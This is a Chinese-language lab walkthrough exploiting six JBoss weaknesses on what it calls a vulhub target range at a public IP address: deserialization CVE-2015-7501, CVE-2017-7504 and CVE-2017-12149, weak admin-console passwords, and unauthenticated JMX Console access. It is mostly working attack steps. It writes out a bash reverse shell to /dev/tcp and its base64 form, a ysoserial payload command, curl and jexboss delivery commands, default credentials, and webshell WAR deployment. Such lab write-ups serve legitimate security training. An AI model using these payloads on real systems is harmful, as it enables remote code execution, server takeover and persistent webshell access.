一、CVE-2015-7501-Jboss JMXInvokerServlet 反序列化漏洞
第一步:开启靶场
第二步:访问该接口,发现直接下载,说明接⼝开放,此接⼝存在反序列化漏洞
http://47.103.81.25:8080/invoker/JMXInvokerServlet
第三步:准备ysoserial⼯具进⾏漏洞利⽤,将反弹shell进⾏base64编码
#反弹shell
bash -i >& /dev/tcp/47.103.81.25/8888 0>&1
#64base编码
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx
#命令使用工具生成恶意文件
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx}|{base64,-d}|{bash,-i} ">exp.ser
第四步:服务器开启监听,终端执行命令,成功反弹shell
#执行命令
curl http://47.103.81.25:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
二、CVE-2017-7504-JBossMQ JMS 反序列化漏洞
第一步:开启靶场
第二步:访问漏洞靶场
#漏洞靶场
http://47.103.81.25:8080/jbossmq-httpil/HTTPServerILServlet
第三步:准备jexboss工具包,geshell
#运行工具,getshell
python3 jexboss.py -u http://47.103.81.25:8080
三、CVE-2017-12149-JBoss 5.x/6.x反序列化漏洞
第一步:开启靶场
第二步:验证是否存在漏洞
#漏洞存在地址
http://47.103.81.25:8080/invoker/readonly
#响应码500 --- 服务器内部错误,无法完成请求 --- 说明⻚⾯存在,此⻚⾯存在反序列化漏洞
#服务器将⽤户post请求内容进⾏反序列化
第三步:使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell
四、Administration Console弱⼝令
第一步:登陆后台
#后台地址
http://47.103.81.25:8080/admin-console/login.seam
#用户名密码
admin:vulhub
第二步:点击web应用,上传后门文件shell.war
第三步:连接webshell
#shell.jsp地址
http://47.103.81.25:8080/shell/shell.jsp
五、低版本JMX Console未授权
第一步:开启靶场
#URL
http://47.103.81.25:8080/jmx-console/
#用户名密码
admin:amdin
第二步:准备通过URL的⽅式远程部署war包
第三步:将后门文件war包上传至云服务器,并测试能否顺利访问到
第四步:填写war包地址,点击invoke跳转
第五步:连接webshell
#URL
http://47.103.81.25:8080/shell/shell.jsp w
六、高版本JMX Console未授权
第一步:开启靶场
#URL
http://47.103.81.25:8080/jmx-console/
第二步:准备通过URL的⽅式远程部署war包cmd.war
第三步:连接webshell
#URL
http://47.103.81.25:8080/cmd/shell.jsp
FROM IYU_